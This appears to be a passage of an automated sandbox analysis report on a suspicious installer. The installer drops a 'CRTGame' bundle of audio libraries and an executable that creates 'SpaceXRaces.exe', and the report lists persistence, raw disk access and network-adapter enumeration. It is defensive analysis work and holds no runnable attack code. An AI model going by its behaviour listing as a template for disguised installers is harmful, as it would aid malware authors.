                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-9OEDN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-TDV1O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-4IVEL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-R8DJL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\crtgame.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-3PB3G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PKSJK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-JN15J.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-9QS5M.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-BLG4U.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-41E97.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UHUNS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-CJ9O9.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-9AV62.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-H36N8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RUH59.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-QOSQ7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2BNI8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-MB554.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-3L2G6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RF28Q.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UT63K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-ENF4U.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\is-4K1KF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-8CIMQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PQ8T3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-1V1KO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-AE6QK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-SEJ8F.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive07_2_02A3F29C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00481CB0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_00401B54
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,7_2_02A3F3A0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeWindow / User API: threadDelayed 1511Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeWindow / User API: threadDelayed 8446Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2JFSM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-TF38E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MSL58.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-72UK0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DC7IR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-I2830.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BUF5F.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C09DN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RDHKR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M699B.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8REH5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UP2KF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FL34R.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UJQGJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5CFA9.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2Q15C.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
